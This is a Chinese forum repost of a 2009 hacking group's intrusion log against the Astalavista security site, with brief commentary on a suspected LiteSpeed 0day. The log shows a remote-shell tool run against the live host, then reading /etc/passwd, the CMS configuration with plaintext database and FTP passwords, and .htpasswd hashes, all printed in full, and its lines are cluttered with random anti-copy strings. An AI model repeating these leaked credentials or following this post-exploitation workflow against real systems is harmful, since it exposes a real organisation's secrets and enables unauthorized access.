找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2209|回复: 0
打印 上一主题 下一主题

Astalavista被蹂躏过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:07:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。" _8 `6 K; E4 `: q" X
' q- n% N6 s: N) _
[root@front3 ~]# curl -I litespeedtech.com+ v; I9 T% V  T8 C8 A
HTTP/1.1 200 OK
9 g  i8 x. o6 A" XDate: Fri, 05 Jun 2009 22:54:51 GMT
( s0 k% w6 q# [; L- E) N+ cServer: LiteSpeed0 w! d$ R  \: d5 a- c8 k0 d6 e
/ D) J+ n1 F0 r; s$ e: B7 X
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-7 f' `/ R  b$ ^9 d) l2 T

8 k6 h0 [; u7 V% n3 \; V9 v% K* w8 H有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
$ F6 U: o0 U& I, K/ X" x0 L' |( c+ H3 W( k$ r
7 i& b8 ?% |" h$ B1 B
/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \ 3 y+ G3 B; I3 [
/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \# p% @" I% J  m
/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
4 Q* t7 ]9 f+ v( ?" ]' W8 x\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /9 C, U7 C( j$ W! n& Q8 K& @* B+ C
        \/        \/                 \/        \/       \/                     \/                 \/
. X" ?# r, p% ]+ m, L9 R0 p                                  The Hacking & Security Community. ], j" j; y# C/ V- i- |
[+] Founded in 1997 by a hacker computer enthusiast
0 M* `, y' K# e( w[-] Exposed in 2009 by anti-sec group
! V+ e+ f1 x% l2 K3 _* g4 Y* L! y' b: E
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
. }" {9 G, \8 v$ T- @>> 03. Who’s behind the site?% w) @" r) h4 @( A: Y
>>
' z3 ~- N! j* k) M, Z( R>> A team of security and IT professionals, and a countless number of contributors from all over the world.
2 d, h( o* I) ^# O" L; M2 F* e/ A4 r5 Y/ Y
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?/ b* G. ?7 ]6 \! M( P
>>$ d9 j: H9 b. P
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
6 k9 i' D9 @* i5 T) K  |8 j  X$ bmilitary institutions.& P7 x2 w( W% A  ~$ H  o$ a
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.* D* r& w# V, }$ `" I! q  j& ?( D3 F

) |! V8 G; Z+ k/ b; v, H( qWhy has Astalavista been targeted?
' N& y: ]9 v  d, k& t2 o# ^6 t* H3 K
Other than the fact that they are not doing any of this for the “community” but
- ]  o$ A9 v9 c% qfor the money, they spread exploits for kids, claim to be a security community7 i8 J0 W- z9 D" w9 y) ]1 P, m
(with no real sense of security on their own servers), and they charge you $6.66
- G8 z/ I* a( V/ |per months to access a dead forum with a directory filled with public releases9 `5 ]+ e2 `, b; ?, s
and outdated / broken services.: y; _7 Z, ^7 d  C4 P
! m9 Y( E9 B! p7 I
We wanted to see how good that “team of security and IT professionals” really is.
: y' z& }3 _) U) w6 _6 [1 C! {
1 g& D7 M& Z' c" t1 x* ]Let’s begin.
7 k1 K4 k0 f2 V: N1 F$ F) g+ L( Y7 @- l- h2 ^
anti-sec:~# ./g0tshell astalavista.com -p 80( s0 m5 i2 ~/ e6 A7 B& j
[+] Connecting to astalavista.com:80
1 d# d/ a# V. H7 o[+] Grabbing banner…
- _. q1 c# o6 _9 v/ uLiteSpeed+ L& O# O; Y* T; D9 `$ Z- H4 E$ v' a
[+] Injecting shellcode…4 t1 ^# f8 ?: @% s+ n0 C
[-] Wait for it
& J$ F+ `* L# ?; P! R/ g
1 W& v3 j( \3 h1 x1 n) |[~] We g0tshell
! E$ m8 k) T* ^uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
" o3 y! m4 S# W/ S* c% `ID: uid=100(apache) gid=500(apache) groups=500(apache)' ^2 s% r) e4 Z3 \1 ~, P

) y2 k6 `# C7 }: ]& h, @$ `0 Tsh-3.2$ cat /etc/passwd
9 P9 p$ Z, p5 f: Z% D( groot:x:0:0:root:/root:/bin/bash0 Q" a- p% k3 E/ P2 h
bin:x:1:1:bin:/bin:/sbin/nologin
$ Y( ^# r$ O6 [3 ?8 a0 d! D3 Xdaemon:x:2:2:daemon:/sbin:/sbin/nologin" p; z' h9 |" L6 H" Q) r" H$ Q
adm:x:3:4:adm:/var/adm:/sbin/nologin
8 ]3 o$ Q: H0 g1 a7 i% L* Olp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
* k2 h9 `* Y% @0 L0 D8 p% t) G  esync:x:5:0:sync:/sbin:/bin/sync
+ K. J2 k  f- I7 d. Bshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
& ]$ b9 M- h( ?, E( f" thalt:x:7:0:halt:/sbin:/sbin/halt" g( V- }4 f! Y8 A! @
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin5 i5 a7 I$ S8 G0 R  f2 E& o
news:x:9:13:news:/etc/news:
* u" N6 g3 z7 Guucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin6 w2 @6 g1 N) X, T
operator:x:11:0perator:/root:/sbin/nologin  l: W* y9 N" j( S
games:x:12:100:games:/usr/games:/sbin/nologin4 N8 |4 v1 ^$ [
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin# Z! k$ y4 a5 ]' `0 A# s9 F! R
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin$ S" H$ O4 t- F' J  ~/ u, ?
nobody:x:99:99:Nobody:/:/sbin/nologin
. k6 h4 o. G3 Z' mrpm:x:37:37::/var/lib/rpm:/sbin/nologin
# e- S/ y; W6 j8 b6 O) j3 Sdbus:x:81:81:System message bus:/:/sbin/nologin9 p( D* _4 x# s) y2 d
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin" h: I% o5 K/ t+ Q
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin, r  [! r% R# t* b+ {- l& ?! X
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin9 k: q$ q' w1 C/ E8 B* o
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
4 D8 y! ^5 E  D( e: Q0 }haldaemon:x:68:68:HAL daemon:/:/sbin/nologin; n7 `) c0 B9 `0 X5 h- p
rpc:x:32:32ortmapper RPC user:/:/sbin/nologin
  @/ T/ ^' B6 Z3 y) ?" ^rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin6 |7 \0 s0 O. q, h) A: [
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
0 ?0 d1 l- r) k. m7 Ksshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
' q: w. A: m+ l6 G! M; _  qpcap:x:77:77::/var/arpwatch:/sbin/nologin
  V2 ?& `' |4 y) Nnamed:x:25:25:Named:/var/named:/sbin/nologin
* s. |7 a  x. aapache:x:100:500::/var/www:/bin/false5 X3 x: w. r/ `. x5 Y0 h
diradmin:x:101:101::/usr/local/directadmin:/bin/bash5 x8 x8 j3 T& T: ~( P. h0 z
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash7 b9 D: x* r" P3 }2 ?
webapps:x:500:501::/var/www/html:/bin/bash& N2 }8 c" k. n/ W
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash  F6 x. x# o0 I1 @1 g
admin:x:501:502::/home/admin:/bin/bash
: @6 A% C2 F$ U4 d+ Tjon:x:502:503::/home/jon:/bin/bash  A. I! V7 D3 i* o) ^
com:x:503:504::/home/com:/bin/bash6 T4 }5 M1 `9 E' B/ j- i
ntp:x:38:38::/etc/ntp:/sbin/nologin1 g* W& ~9 j- M- U9 f& v
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin+ U+ f0 @" ]1 n
astanet:x:504:505::/home/astanet:/bin/bash
8 a( y: d% n. k3 Z$ ^. b0 xavahi:x:70:70:Avahi daemon:/:/sbin/nologin
. r% |" K0 b) a$ T' k  Wavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
, x& q2 \2 ~/ P, ^* z" {! q) f0 b6 r, m5 p
sh-3.2$ cat /etc/hosts
8 Z  Z4 k& F. h6 f7 Y# Do not remove the following line, or various programs
1 V5 ^% b+ _- H* k# that require network functionality will fail.9 T4 b( s; |& Y' b. s
127.0.0.1       localhost.localdomain   localhost6 O$ ?" \: F% i5 z3 h! V
::1     localhost6.localdomain6 localhost6
6 F) N" Q) T' `* A2 E80.74.154.172           asta1.astalavistaserver.com
6 v+ U5 R! V7 S% q$ u# v- o$ y3 l; L( h
sh-3.2$ pwd
' ^8 I" w2 S1 H/home/com/public_html; A; T- t" M( c3 [+ g

3 G+ J1 Q& a$ z( p) d/ Gsh-3.2$ ls -la
; a* Y8 r4 P/ ?6 E# o  Ototal 18460- i: |9 `5 Q( ~4 |' u
drwxr-xr-x 30 com apache     4096 May 28 17:06 .
4 F, H1 w$ p1 m- Jdrwx–x–x 11 com com        4096 Jun 25  2008 ..
0 m1 ~/ S  U1 ]# d% J% ?4 sdrwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
0 a, n$ k8 U1 ]+ c  adrwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache* N9 w9 ^" f! c4 b( U% }
drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
- C2 G" p& v3 ~, N5 O$ ]2 Tdrwxrwxrwx  2 com com        4096 May 19 00:50 config
, r3 G( |. S8 Z( i  F  j  ddrwxr-xr-x  2 com com        4096 Mar 20 11:05 core: y0 ~- `5 B3 b* F2 C
drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules
, I4 ~! V0 X. o) a& a3 [# Zdrwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing' }0 {1 a( c$ @' _6 C2 P7 s5 u( F. B
drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo1 w+ Z- ?7 Q& E0 O; ^
drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__/ v* z- h/ p" H$ v
-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php$ w- E: g! R2 Z9 M/ L6 B/ U- v
drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
2 {; j. [4 A* z2 v+ P$ }0 s/ F) Ydrwxr-xr-x  3 com com        4096 Feb  2 19:29 editor; k3 H% K3 Y" z4 D
-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico$ R1 H( e  A; x2 U( E7 U: q2 X. C
drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed' A, F* G/ s- t/ N: ?
-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess) u8 J2 d" \4 M6 ^
-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak7 R! O! C/ ?" O
-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak. m! j- R; D, K; K
drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool6 t8 m1 g, f% H9 ~. w/ D7 H
drwxrwxrwx 14 com com        4096 Feb  2 19:29 images
/ F" E% `% n5 R8 o-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php
7 [7 e1 p9 ]# \1 _) `! @drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
& w4 I( |/ a! q* s, vdrwxr-xr-x  8 com com        4096 Feb  2 19:29 lang  U) r5 w9 M: O6 p
drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib$ e' ^5 I6 E4 x/ j2 Z5 P1 }
drwxrwxrwx 12 com com        4096 Jun  2 07:47 media3 k7 z3 v0 t; b" p& |) j( ~
drwxr-xr-x  8 com com        4096 May 11 12:48 modifications
2 H6 b" V& o9 u/ w3 T) [& f) `' edrwxr-xr-x 34 com com        4096 May 28 16:30 modules8 y: ^2 f" }( F9 o6 g
drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin  C! p' h5 z) P$ o
drwxrwxr-x 22 com com        4096 May 28 17:06 _new: a; p% @5 K. |1 r/ k: V; y$ p
drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old0 x: y7 r8 I* Q! R* I  ~
drwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy
+ w4 C' R% g/ t, A8 {$ E" N8 [: Gdrwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy' \! U9 G6 D: E
-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt
+ T9 T' k& D& _4 p-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml
, k1 o3 R, N1 T# W6 w& Z% d-rw-r–r–  1 com com         223 Mar 30 15:32 test.php7 X6 }7 ~6 k/ U5 y
drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes0 l$ [. H( n* f1 m% w- Z: A
drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp
3 M& R! _1 ^  w$ ^% Adrwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam; I6 X* Z- T  s: }! G5 x

& S  ~# d1 K! ?( A( {sh-3.2$ head -20 index.php1 \' c. x7 ^% {6 S+ d+ z' q
<?php! Y2 }/ `$ q7 N$ k' l( n: J; F5 \
0 g7 h, Q. M* h1 f
/**3 s# ^$ ~6 {; H$ \- Y  @9 B
* The main page for the CMS! `9 }$ r- ?/ k# W5 S
* @copyright   CONTREXX CMS - COMVATION AG
& e  |6 X' B' w% v! l- f* @author      Comvation Development Team
! U3 j1 \. p1 y; h, m# G1 ~* @version     v1.0.9.10.1 stable
' [7 y) u! p" k! V0 Q* @package        contrexx% k$ X0 K! ]# }5 c9 s8 s
* @subpackage    core1 k* _; m) T: b" @" Z1 ?
* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage# E( `# m% w6 P
* @since       v0.0.0.0
2 x6 V8 c. [4 J* @todo        Capitalize all class names in project6 g4 r  A$ K5 C  ^* f+ {9 e! ~
* @uses        /config/configuration.php
# L4 |/ i0 K' U6 M* @uses        /config/settings.php
' S, f7 O* n4 K0 M8 i# s* @uses        /config/version.php: S* w" M( x: Y3 O: {
* @uses        /core/API.php; O5 j( R; Q, |# p. Y3 B
* @uses        /core_modules/cache/index.class.php
; S! R4 x2 Z' |7 A* @uses        /core/error.class.php
$ T$ h5 r  y( a; z* V. e: u* @uses        /core_modules/banner/index.class.php! o4 F8 C4 j0 \1 ]1 A8 D1 e
* @uses        /core_modules/contact/index.class.php
1 ^! M- `* i) k$ I- e. V; A/ ]! A# R; h7 n# u
sh-3.2$ cd config/
% K! S7 J$ V5 ?4 K# F4 N( Xsh-3.2$ ls -la
( o0 J4 X+ k# Z5 ]total 326 R$ a; d: P0 \+ }1 D+ r
drwxrwxrwx  2 com com    4096 May 19 00:50 .
* W/ g  _0 X) o# ~0 xdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..  G7 I$ N6 L6 i) z7 R
-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php
9 n- ]5 L& C2 f$ j+ e+ O- B- S-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php
: d& a; C$ P" K9 o3 v. u-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php4 w( n* k% E! G  ]. @, Z
-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php
' T# @+ Q7 ]' z3 Q6 n4 P3 g: B# Z" i( k! }8 _! Y" I/ Y
sh-3.2$ cat configuration.php
1 }7 D' Y) D; j" S9 R2 ~[snip]
3 `8 I$ s# v: p& z- i% m; ?$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
' ~, d" m' r) f: Q! d- A, K$ r$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name$ T8 ?: [+ C7 l! R: B7 D
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
! d$ C6 o& C7 P& F. Y$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username3 p  X1 d! e2 c2 C: e; e
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
6 Y7 U+ u0 {; J; w- V8 A$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
) ^* w' t. P' ]7 j- @+ ?7 ?8 X$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)) o* ^9 e5 |: ?+ _3 a. O: n2 L
[snip]
1 w) }1 `8 P1 K% b4 ~6 W! z5 ~$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
% }2 ~: ^$ k( r8 `! k' ?$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode
/ S+ e& E" ~0 p, s. }$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost# A- x- ^; E& H5 w' Q+ T
$_FTPCONFIG['port'] = 21; // Ftp remote port
* Y, F& h4 V- s: P0 b* j) ~$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
! e  T7 ]* l9 @% {  Q( j$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
- y7 `& {5 C4 o. G% ^: D$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms& X7 f% D' `- S6 Q8 v4 F

8 f: ]- T0 k. S4 B# Y! }sh-3.2$ cd ..
7 m9 k4 J, O; psh-3.2$ cd dvd/1 X( h0 A) R; E3 \9 U4 n; E
sh-3.2$ ls -la
* Y* h  B  E- M* s- Etotal 2913780- s1 b: J  g, p9 G- P5 Z/ M6 J( C4 P
drwxr-xr-x  2 com com          4096 Sep  9  2008 .8 ^$ O! T- y; [) }* [' f0 g$ w
drwxr-xr-x 30 com apache       4096 May 28 17:06 ..' U! [/ m2 K, }
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar
6 k3 R& c3 w3 Y: }-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar. n- p( P, a) U+ c; c# l0 G$ N
-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar; S/ g5 l/ M0 z/ Z/ e. V
-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess
' `2 B( i* E7 g' N
( j% Z" S9 }8 a: _sh-3.2$ cat .htaccess! m" c% ~+ D+ N8 \) v+ |
authType Basic4 x8 U- z4 ^* S$ z! I. F8 w! q
authName DVD
/ d  y1 B* s: c: g' t) x/ o& gauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
2 Z2 M4 K. P& ^require valid-user
% _& M2 C9 Q0 t6 P4 B* J8 K0 q- w, q0 b% N, H9 q
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd( @( Q6 ?7 {3 X# A3 R  i
DVDdownload:CRD8cuY6.MPT6
1 w( S3 B# _+ w6 d. iDVDdownload2:CR8a36.wluFMg
( U' K; u' m% n  X0 z# F3 c. u0 P" Z* x3 L
sh-3.2$ cat test.php
$ O/ q3 s. W* d% J- Z8 e$ V<?php
" y0 c$ ~% w( i4 u) h$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
4 _! G( I: b9 U( U) X6 I; ~$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));
1 E! a" V9 y9 s* f" g7 L1 w# ]" J" T) becho $url;
: d# ~1 e6 q! \2 v9 f?>: D# E* Q$ E" r3 v& y9 G

) H6 I! @5 a' A/ k3 r$ tsh-3.2$ cd modifications/" R+ A2 C, _7 k' R$ D
sh-3.2$ ls -la/ J( r# O$ j% V5 m  f* j
total 32. i  p& L8 k, t" n0 w$ W5 F
drwxr-xr-x  8 com com    4096 May 11 12:48 .
5 |* s: ^% }4 u* \' }drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
# p' G6 x& H% Q- Ydrwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng$ v4 D% E& ^( y+ l% C- h6 k
drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs) O- b( G6 h5 N+ [) ^/ p( Z
drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools
! g, r& Y2 o3 `; \$ [6 `' U- D! Kdrwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
! H1 ?+ \) z) |+ mdrwxr-xr-x  2 com com    4096 Feb  2 19:33 search
' W7 L! Q! s0 F) t3 V* ndrwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp3 c3 \4 b+ N0 y

* e0 l0 A. B; ~( e% I1 Tsh-3.2$ ls -R2 o3 n5 n- K6 N
.:
- ~: K2 D# J1 A) Acom_avtng  cronjobs  onlinetools  pjirc  search  _tmp7 |- L8 M; p& k6 u: f! x, d
' x2 F8 \4 I' |$ R& W" @5 r
./com_avtng:& k) y+ M- I" M
avtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts: `) O% Q" ?3 ^# x( [
( t2 ]6 y1 N' F" B9 q
./com_avtng/scripts:
# H/ Y, G- n# m$ M; W3 r  Wpopunder.js
% \( }2 ]! m* }9 w1 u" S% k' j( h- w4 e9 u, N9 R* N$ v
./cronjobs:$ A+ k8 M  H* K. l) X9 B: N9 M
exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp
7 D+ q  N/ a0 d$ s" q2 J' `8 ^
6 W4 \. m! U+ }, s' t1 O* ^./cronjobs/tmp:- m  q; R8 O6 h+ k
contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv
7 u) {8 [5 x3 D5 O" ]; |* Q
: i  t4 ?9 A& \) R./onlinetools:5 F$ l3 K* @: D- Z
index.php
0 D2 y  w4 L9 Y* U, A; C5 X; c* B( [( S3 k/ O
./pjirc:. u( y( t3 h$ Q5 p& [& ^
a_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt8 `- }/ l: W# G, j* d/ Y
AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt# h: Q6 r6 M5 |; `( G# h
background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd2 _1 I6 ^* ^) m+ E7 j# }
7 X' _* |$ i( {5 r* F
./pjirc/img:' _2 O- l4 i+ Z$ L( Z
ange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif
0 K6 D( ?# c* e1 parbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   
6 }& j1 e4 l$ x1 I+ everre-eau.gif
! k, h: V4 [& `6 ]" \' Iargh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  * P9 K1 o, E" R
verre-vin.gif2 [( ^) d5 w% P5 m* Z2 e
ballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif# ?- q2 y, c6 p
biere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif
1 A3 f4 l  Z' v6 G8 x$ G6 @# P6 P
./pjirc/snd:2 L! S8 N1 f5 b3 i0 e. r' p- b
bell2.au  ding.au5 J' ?% G4 S3 }$ [5 R

0 {- H# G+ s4 @./search:* A! q9 k& t0 o! y/ l
searchEngines.php  search.php
  [1 ~8 z+ C: p% }5 p& ]. @  {
8 ~0 i! V) N1 o1 C8 f. A* ]./_tmp:$ b8 N6 r+ L- g; C
defaultPorts.php  defaultPorts.txt7 X* h3 s, d" |7 V' M

+ w. @$ i/ K, W: o6 lsh-3.2$ cd cronjobs/: ~3 D0 V9 e$ m8 L( t; @# ^2 x
sh-3.2$ cat exploits.php. P2 n8 q. @& t* F+ _6 X% A$ U
[snip]8 D2 |7 L5 r8 g' N: b$ B
$categories   = array();0 {! |. {( E4 N7 E2 d
$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;1 M3 n; v* |" S2 n
$expolits     = file($milw0rmFile);* w( L: H* H, _  ?+ n/ T
$comExploits  = array();8 j9 ]& v- f$ a# O- b
[snip]7 }5 _5 P) V6 C1 Q  X* j, q
// manage data/ k! l, \5 J6 E3 W8 D2 ~# h
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
+ c+ X, p1 j. Q9 c( \# z4 z  x  F, h
    // get path and title
9 B$ z+ W; O+ D& K# L; @    $expolits[$x] = trim($expolits[$x]);
( |; p4 R% v( s- _8 S/ f& J    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));! d- ?7 G, f& a$ s8 z6 V9 V: u: ]
    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
! h7 ~  L; d% ~- g! \/ T
- i5 N& e& {& F    // check if file exists
% `- S* @( Y, f. i( i3 `2 c/ F    if (file_exists($path)) {: @1 U1 Y* @, W/ ~6 Q0 f! _% N

. M& I- b9 Z  ?, ?: G$ a        $text = file_get_contents($path);9 L& x1 a" h) _$ b

  a0 _& \* w! q( A& C6 A# M; W' p        // get content and date
: ]9 S& n1 h( b: y        //$text = htmlspecialchars($text, ENT_QUOTES);+ j2 E5 M# E) u
        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));" g4 o# ?8 a! j( X- x/ V8 E
        if ($tmptext != ”) {! n+ m  G+ T$ S+ l; F
            $text = $tmptext;
: P3 m5 c4 n7 |" R( S! G% Z        } else {7 ^3 }$ b2 V. v+ p3 m! H
            $text = addslashes(htmlentities($text,  ENT_QUOTES));$ V6 s$ Z/ a/ E
        }
9 Y) ?. m& I* J: `3 U3 f        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));2 C$ p+ {, Q: h9 |+ D/ |9 L
        $tmp  = explode('-', $date);6 S1 i. s4 @- n+ p* f
        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
8 g: M: x: l9 C7 a( [/ X        $cat  = getCategory ($path);6 x, a/ q! C: V
        $ext  = pathinfo(basename($path));
5 @" L. T+ Z" R        $ext  = $ext['extension'];/ s4 i; a1 k' w# b! b) U8 y
        $qStr = ”
3 J$ L, p4 X* U) H4 u: n% {  }+ n            SELECT  `id`$ F8 ^/ a. g* B5 S5 y4 K, X6 D% i
            FROM    `contrexx_module_exploits`
2 i- O/ \/ J  ]            WHERE   `title`  =  ‘” . $title . “‘+ K; _$ W6 b9 {
            AND     `date`   =  ‘” . $date . “‘
9 g7 s( h* ~% g        “;
0 g. S: f% f: r; t        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
/ Q# o! x. l7 N/ U3 {8 z7 f        $q = $_objDB->query($qStr);
$ e9 Z$ u. A9 P) I- ^/ W$ c. x  d1 ~: i( I2 P" Z. q" k
        if ($q->numRows() == 0) {1 }) g; [# v; _! r6 }# M# z
7 ~/ n. P- P* N, O5 Y5 g" ~  f
            // prepare array
& ~& O! K9 }! @" f8 L) ?3 b            $comExploits[$x]['date']      = $date;2 }+ m9 Q, \4 h- W% I/ R& K1 D
            $comExploits[$x]['title']     = $title;
4 r0 }/ ]. L& S! h9 s& K            $comExploits[$x]['author']    = ‘milw0rm’;
3 }5 P$ f, A3 z$ [            $comExploits[$x]['text']      = $text;) t; F* x2 l5 K
            $comExploits[$x]['source']    = $ext;# k# q( P  }' Z% L6 V
            $comExploits[$x]['url1']      = ”;
/ V$ A' ?" l& u" n/ F. t, p" g            $comExploits[$x]['url2']      = ”;! I0 m; |! @1 W; h: ]
            $comExploits[$x]['catid']     = $cat;3 z5 w" d# M% P$ b2 B
            $comExploits[$x]['lang']      = ‘2′;2 E- A3 R! n. b; x$ S
            $comExploits[$x]['userid']    = ‘12′;  o8 b$ N7 n2 `8 p: H: [! ~% b+ H
